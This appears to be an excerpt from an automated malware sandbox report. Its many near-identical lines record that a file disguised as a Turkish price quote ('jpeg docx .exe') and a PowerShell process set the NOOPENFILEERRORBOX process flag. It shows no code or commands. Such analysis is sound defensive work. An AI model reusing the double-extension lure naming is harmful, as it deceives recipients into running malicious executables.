                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
